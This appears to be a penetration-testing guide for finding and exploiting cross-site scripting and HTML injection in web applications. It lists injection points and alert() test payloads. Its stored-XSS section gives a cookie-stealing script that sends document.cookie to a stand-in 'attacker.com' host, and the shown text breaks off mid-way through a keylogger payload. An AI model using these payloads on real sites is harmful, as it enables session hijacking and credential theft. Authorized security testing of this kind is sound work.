Cross-Site Scripting and HTML Injection Testing

Cross-Site Scripting and HTML Injection Testing

Purpose

Execute comprehensive client-side injection vulnerability assessments on web applications to identify XSS and HTML injection flaws, demonstrate exploitation techniques for session hijacking and credential theft, and validate input sanitization and output encoding mechanisms. This skill enables systematic detection and exploitation across stored, reflected, and DOM-based attack vectors.

Inputs / Prerequisites

Required Access

• Target web application URL with user input fields
• Burp Suite or browser developer tools for request analysis
• Access to create test accounts for stored XSS testing
• Browser with JavaScript console enabled

Technical Requirements

• Understanding of JavaScript execution in browser context
• Knowledge of HTML DOM structure and manipulation
• Familiarity with HTTP request/response headers
• Understanding of cookie attributes and session management

Legal Prerequisites

• Written authorization for security testing
• Defined scope including target domains and features
• Agreement on handling of any captured session data
• Incident response procedures established

Outputs / Deliverables

• XSS/HTMLi vulnerability report with severity classifications
• Proof-of-concept payloads demonstrating impact
• Session hijacking demonstrations (controlled environment)
• Remediation recommendations with CSP configurations

Core Workflow

Phase 1: Vulnerability Detection

#### Identify Input Reflection Points Locate areas where user input is reflected in responses:

# Common injection vectors
- Search boxes and query parameters
- User profile fields (name, bio, comments)
- URL fragments and hash values
- Error messages displaying user input
- Form fields with client-side validation only
- Hidden form fields and parameters
- HTTP headers (User-Agent, Referer)

#### Basic Detection Testing Insert test strings to observe application behavior:

<!-- Basic reflection test -->
<test123>

<!-- Script tag test -->
<script>alert('XSS')</script>

<!-- Event handler test -->
<img src=x onerror=alert('XSS')>

<!-- SVG-based test -->
<svg onload=alert('XSS')>

<!-- Body event test -->
<body onload=alert('XSS')>

Monitor for:

• Raw HTML reflection without encoding
• Partial encoding (some characters escaped)
• JavaScript execution in browser console
• DOM modifications visible in inspector

#### Determine XSS Type

**Stored XSS Indicators:**

• Input persists after page refresh
• Other users see injected content
• Content stored in database/filesystem

**Reflected XSS Indicators:**

• Input appears only in current response
• Requires victim to click crafted URL
• No persistence across sessions

**DOM-Based XSS Indicators:**

• Input processed by client-side JavaScript
• Server response doesn't contain payload
• Exploitation occurs entirely in browser

Phase 2: Stored XSS Exploitation

#### Identify Storage Locations Target areas with persistent user content:

- Comment sections and forums
- User profile fields (display name, bio, location)
- Product reviews and ratings
- Private messages and chat systems
- File upload metadata (filename, description)
- Configuration settings and preferences

#### Craft Persistent Payloads

<!-- Cookie stealing payload -->
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>

<!-- Keylogger injection -->
<script>
document.onkeypres

<!-- truncated -->